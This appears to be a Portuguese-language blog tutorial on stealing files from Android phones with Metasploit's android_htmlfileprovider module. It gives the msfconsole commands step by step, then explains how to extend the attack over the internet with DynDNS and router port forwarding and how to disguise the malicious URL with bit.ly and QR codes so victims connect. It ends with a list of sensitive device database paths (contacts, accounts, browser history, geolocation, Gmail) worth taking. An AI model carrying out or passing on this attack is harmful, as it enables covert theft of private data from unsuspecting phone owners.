Nesse arrigo estaremos abordando uma técnica de "hackear" os dispositivos moveis
com o sistema operacional Android. Vamos utilizar a ferramente já conhecida por alguns, o Metasploit com um auxiliar de sua biblioteca que pode ser encontrada no Sistema operacional BackTrack. Isso pode ser possível quando um dispositivo esta conectado em sua rede local, Mas usaremos o DynDNS que nos da um alcance melhor do ataque, e veremos como ofuscar o endereço através de codigos QR e site que encurtam links como o bit.ly .
Vamos começar!
Roubar arquivos android_htmlfileprovider
A primeira coisa é começar o msfconsole no terminal do backtrack
- root@bt:~# /opt/framework3/msf3/msfconsole
Agora vamos usar um dos módulos auxiliares do Metasploit, que serve exatamente para o nosso objetivo:
- msf > use gather/android_htmlfileprovider
- msf auxiliary(android_htmlfileprovider) >
Agora, vamos ver as opções que oferece o módulo...
- msf auxiliary(android_htmlfileprovider) > show options
- FILES (arquivos do Android que queremos roubar)
- SRVHOST (IP local que estará a espera de conexões)
- SRVPORT (A porta que estará a espera de conexões)
- SSL (ALTERNATIVA - Se queremos usar SSL para negociação da conexão)
- SSLVersion (Se tiver ativado a opção acima, indique a versão do SSL )
- URIPATH (A URI que será utilizada)
No momento , não vamos tocar na opção FILES. Já na opção SRVPORT mudará para 80, uma vez que é a porta http normal, e será mais suspeito se conectar-se a uma outra porta. Além disso URIPATH também vai mudar, que por padrão é uma seqüência aleatória, a vítima será direcionado para a raiz do servidor, faça com a baixo:
- msf auxiliary(android_htmlfileprovider) > set SRVPORT 80
- SRVPORT => 80
- msf auxiliary(android_htmlfileprovider) > set URIPATH /
- URIPATH => /
Agora só podemos começar a façanha usando o comando run, e esperar algum dispositivo conectar ao nosso IP ouvinte.
Veja a Imagem abaixo:
Exploit Executado |
Usando DynDNS para aumentar o alcance
Como dizemos, se fizermos esse ataque só para redes locais (LAN), como smartphones não costumam passar muito tempo conectado a uma rede Wi-Fi que estamos interessados. Mas é possível aumentar essa exploração, para fazer isso, neste caso vamos usar o DynDNS, que é um serviço que fornece o endereçamento dinâmico de domínio tipo site.dyndns *. Org .
Temos que ir no site da http://dyn.com/ e criar uma conta. Após isso, pode registrar o domínio que escolhemos. Após este iria para as configurações do roteador e indicar o domínio, o nome de usuário e senha, como você pode ver (em outros roteadores pode ser diferente).
Devo dizer que DynDNS é um serviço excelente. Depois de configurar o domínio DynDNS só precisa redirecionar corretamente no ip do roteador. Ou seja, no nosso caso, a vítima irá se conectar ao vidasconcurrentes.dyndns.org (na porta 80) e deve ser definida para ir para a porta IP em que ouvimos o exploit.
Ofuscando o ataque com códigos QR e bit.ly
Temos tudo para o ataque, teria que passar a url para as vítimas e esperar por ele para se conectar. O problema é que um estilo vidasconcurrentes.dyndns.org url pode ser bastante suspeito. Neste caso, use um encurtador de URL, usaremos o bit.ly ( pode se encontrar vários).
Finalmente, se quisermos um ataque mais viral, podemos criar um código QR (http://qrcode.kaywa.com/) usando o link que o encurtador de link do bit.ly nos deu , sendo ainda mais difícil de detectar.
O QR vai estar camuflado com o link do Bit, veja o EX : http://bit.ly/q9wRCW , que redireciona para o domínio criado no DynDNS, o vidasconcurrentes.dyndns.org, que estará com o exploit a escuta.. Veja o Exemplo do QR.
Tendo sucesso em sua invasão, basta usar a criatividade para explorar, alguns diretorios do android em especial estará listados a baixo:
Banco de Dados de Contatos
/data/data/com.android.providers.contacts/databases/contacts.db
Banco de Dados do Browser
/data/data/com.android.browser/databases/browser.db
Banco de Dados de Contas
/data/data/com.google.android.googleapps/databases/accounts.db
Banco de Dados de Geolocalização
/data/data/com.android.browser/gears/geolocation.db
Diretório de Banco de Dados do Telefone
/data/data/com.android.providers.telephony/databases/
Banco de Dados de historicos
/data/data/com.google.android.apps.maps/databases/search_history.db
Diretório de Banco de Dados de E-Mail
/data/data/com.google.android.providers.gmail/databases/
A maioria dos aplicativos tem um diretório de bancos de dados, pode-se obter o suficiente de informação.
0 comentários:
Postar um comentário
ORA VIVA, OLHA TEU COMENTARIO VALE MAIS DO QUE OURO PARA MIM, PRECISO DELE PARA MELHORAR A DISPONIBILIDADE DO BLOG.